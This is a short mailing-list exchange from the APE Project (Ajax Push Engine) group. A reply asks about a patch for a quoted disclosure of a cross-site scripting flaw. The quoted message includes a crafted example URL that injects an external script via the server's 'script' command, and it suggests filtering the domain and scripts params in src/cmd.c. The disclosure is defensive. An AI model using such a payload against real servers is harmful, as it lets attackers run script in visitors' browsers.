Have you released any patch, if you made some workaround what file should we patch?
On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: > I managed recently with an issue that allows to inject any js script by > preparing link > like:http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}] > > It allows either attach script from your url or inject script directly such > as in this example. > > The solution for this issue is to filter both params domain and scripts in > file src/cmd.c (function: cmd_script()) in ape server. -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
